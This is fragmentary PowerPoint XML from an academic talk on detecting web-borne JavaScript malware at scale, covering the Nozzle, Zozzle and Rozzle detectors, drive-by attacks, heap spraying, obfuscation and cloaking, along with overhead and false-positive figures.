          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1032" name="Picture 8" descr="http://www.fyrepel.com/Images/measure_block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0000" y1="82674" x2="30000" y2="82674"/>
                            <a14:foregroundMark x1="17636" y1="84557" x2="17636" y2="84557"/>
                            <a14:foregroundMark x1="43273" y1="75706" x2="43273" y2="75706"/>
                            <a14:foregroundMark x1="84909" y1="42373" x2="84909" y2="42373"/>
                            <a14:foregroundMark x1="87818" y1="29567" x2="87818" y2="29567"/>
                            <a14:foregroundMark x1="87818" y1="23540" x2="87818" y2="23540"/>
                            <a14:foregroundMark x1="14727" y1="76648" x2="14727" y2="76648"/>
                            <a14:foregroundMark x1="89091" y1="33898" x2="89091" y2="33898"/>
                            <a14:foregroundMark x1="86727" y1="32392" x2="86727" y2="32392"/>
                            <a14:foregroundMark x1="88727" y1="26742" x2="88727" y2="26742"/>
                            <a14:foregroundMark x1="88364" y1="20339" x2="88364" y2="20339"/>
                            <a14:foregroundMark x1="90182" y1="23540" x2="90182" y2="23540"/>
                            <a14:foregroundMark x1="88364" y1="18644" x2="88364" y2="186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535" y="5240023"/>
                <a:ext cx="1119771" cy="1081088"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/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pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Rounded Rectangle 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2167270" y="4983956"/>
              <a:ext cx="1414130" cy="320040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Overhead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86200" y="4876801"/>
            <a:ext cx="4572000" cy="1295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1.1%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> runtime overhead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1.4%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> memory overhead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93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85800" y="1714500"/>
            <a:ext cx="7620000" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 629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For most sites, virtually no overhead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Rozzle: Take Away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685800" y="2724150"/>
            <a:ext cx="3733800" cy="2438400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 629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Tremendous impact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>on runtime detector due to increased</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>path coverage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0" y="2724150"/>
            <a:ext cx="3733800" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 629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Visible impact on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>static detector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4572000" y="3905250"/>
            <a:ext cx="3733800" cy="1257300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 629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More important with growing trend to obfuscation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685800" y="5372100"/>
            <a:ext cx="7620000" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 629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Also improves other existing tools: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>xposes detectors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>additional site content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64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23610" r="53472" b="10557"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="266700" y="1619250"/>
            <a:ext cx="3924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Detection Landscape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37378"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1447800" y="16002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50088" y="228600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[Usenix ’09]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7850088" y="3692009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[Usenix ’11]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696200" y="5029200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[Oakland ’12]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09600" y="1667860"/>
            <a:ext cx="8001000" cy="40767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/>
              <a:t>These techniques are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/>
              <a:t>responsible for flagging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/>
              <a:t>1,000s of malware pages daily</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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5800" y="1676400"/>
            <a:ext cx="8001000" cy="4076700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A50021"/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 smtClean="0"/>
              <a:t>One of the widest deployment of static and runtime analysis to date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401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E48C75-D016-4F08-9F51-B3D240ACF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BE48C75-D016-4F08-9F51-B3D240ACF8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0CD44F-31FA-458A-99A0-9DA364AC4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170CD44F-31FA-458A-99A0-9DA364AC4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8C0AC3-421E-4976-8531-27C2CAAC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F98C0AC3-421E-4976-8531-27C2CAAC5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6B8372-1AC1-4C30-9C91-27561FA2B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836B8372-1AC1-4C30-9C91-27561FA2B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A413BF-0915-4049-A5C9-7FD42C018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ACA413BF-0915-4049-A5C9-7FD42C018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586B4C-DC6C-42F1-8E4D-88C4E633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74586B4C-DC6C-42F1-8E4D-88C4E633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074874-D740-4421-B6B9-9D999C367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69074874-D740-4421-B6B9-9D999C367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1C02D-E7D5-45FC-B787-772B2C997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16E1C02D-E7D5-45FC-B787-772B2C997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3" grpId="0"/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="14" grpId="0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/>
              <a:t>Conclusions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6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330892"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2438400" y="16764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4953000" y="1409700"/>
            <a:ext cx="4038600" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -82083"/>
              <a:gd name="adj2" fmla="val 3882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91440" rIns="45720"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Thousands of sites flagged daily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FP rate is about 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" baseline="30000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-9</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" baseline="300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953000" y="2971800"/>
            <a:ext cx="4038600" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -73451"/>
              <a:gd name="adj2" fmla="val 2508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91440" rIns="45720"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Finds much more than Nozzle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FP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rate is about </a:t>
            </a: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10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" baseline="30000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" baseline="30000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953000" y="4648200"/>
            <a:ext cx="4038600" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -83497"/>
              <a:gd name="adj2" fmla="val -40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91440" rIns="45720"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Amplifies both Nozzle and Zozzle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Unmasks cloaked malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" baseline="30000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522901"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1676400" y="1524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401646"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2209800" y="12954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503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132399"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1676400" y="1417637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26888"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2209800" y="12954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694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16917"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1676400" y="2103437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027635"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2209800" y="1295400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955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Brief History of Memory-Based Exploits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58987654"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-685800" y="1879600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81800" y="2311400"/>
            <a:ext cx="1608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1999: Melissa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2001: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CodeRed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2002: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nimda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6F23F4-00BC-40E5-87D3-955B84FFD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E6F23F4-00BC-40E5-87D3-955B84FFD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404882-DD14-4BA4-88D4-4CE7C8D52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D2404882-DD14-4BA4-88D4-4CE7C8D52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E5D067-3D1F-4EA7-A229-15A6123FB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36E5D067-3D1F-4EA7-A229-15A6123FB4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D35638-A429-4DD1-BB50-A83F5A823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FAD35638-A429-4DD1-BB50-A83F5A823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80A3A6-79AD-4272-9C48-7820D3E1CB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F880A3A6-79AD-4272-9C48-7820D3E1CB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22A50F-E370-48F7-A763-3AFEC30AE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7D22A50F-E370-48F7-A763-3AFEC30AE2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0C2106-E3C6-45F7-BE61-F085F69BF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880C2106-E3C6-45F7-BE61-F085F69BFF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is a Drive-By Attack?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5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AutoShape 2" descr="save image"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419998" y="3420986"/>
            <a:ext cx="182879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324600" y="1447800"/>
            <a:ext cx="2058339" cy="1656945"/>
            <a:chOff x="6324600" y="1447800"/>
            <a:chExt cx="2058339" cy="165694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24600" y="1447800"/>
              <a:ext cx="991541" cy="10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7999" y="1752600"/>
              <a:ext cx="991541" cy="10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91398" y="2057400"/>
              <a:ext cx="991541" cy="10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267200"/>
            <a:ext cx="1905000" cy="17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1271835" cy="16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Down Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4026215">
            <a:off x="3976505" y="1726290"/>
            <a:ext cx="374219" cy="3587493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914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Explosion 1 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3276600"/>
            <a:ext cx="3276600" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1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0wned!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20028</TotalTime>
  <Words>3219</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>462</Paragraphs>
  <Slides>40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Finding Malware  on a Web Scale</vt:lpstr>
      <vt:lpstr>Malware Detection Landscape</vt:lpstr>
      <vt:lpstr>Blacklisting Malware in Search Results</vt:lpstr>
      <vt:lpstr>Malware Detection Landscape</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Brief History of Memory-Based Exploits</vt:lpstr>
      <vt:lpstr>What is a Drive-By Attack?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>More Complex Malware</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Malware Detection Landscape</vt:lpstr>
      <vt:lpstr>Nozzle: Runtime Instrumentation Mechanics</vt:lpstr>
      <vt:lpstr>Object Surface Area Calculation</vt:lpstr>
      <vt:lpstr>Nozzle: Runtime Heap Spraying Detection</vt:lpstr>
      <vt:lpstr>Nozzle Experimental Summary</vt:lpstr>
      <vt:lpstr>Malware Detection Landscape</vt:lpstr>
      <vt:lpstr>Zozzle: Static Malware Detection</vt:lpstr>
      <vt:lpstr>Obfuscation</vt:lpstr>
      <vt:lpstr>Runtime Deobfuscation via Code Unfolding</vt:lpstr>
      <vt:lpstr>Zozzle Training &amp; Application</vt:lpstr>
      <vt:lpstr>Naïve Bayes Classification</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Zozzle: Detection on a Web Scale</vt:lpstr>
      <vt:lpstr>Malware Detection Landscape</vt:lpstr>
      <vt:lpstr>Limitations of Zozzle</vt:lpstr>
      <vt:lpstr>What’s Next: Rozzle</vt:lpstr>
      <vt:lpstr>Typical Malware Cloaking</vt:lpstr>
      <vt:lpstr>More Complex Fingerprinting</vt:lpstr>
      <vt:lpstr>Rozzle</vt:lpstr>
      <vt:lpstr>Multi-Execution in Rozzle</vt:lpstr>
      <vt:lpstr>Challenges</vt:lpstr>
      <vt:lpstr>Challenges</vt:lpstr>
      <vt:lpstr>Rozzle: Experiments</vt:lpstr>
      <vt:lpstr>Rozzle: Take Away</vt:lpstr>
      <vt:lpstr>Conclusions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Zorn</dc:creator>
  <cp:keywords>Fall 2010 presentation</cp:keywords>
  <cp:lastModifiedBy>Ben Livshits</cp:lastModifiedBy>
  <cp:revision>320</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-06T17:30:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-07-18T20:28:31Z</dcterms:modified>
</cp:coreProperties>
</file>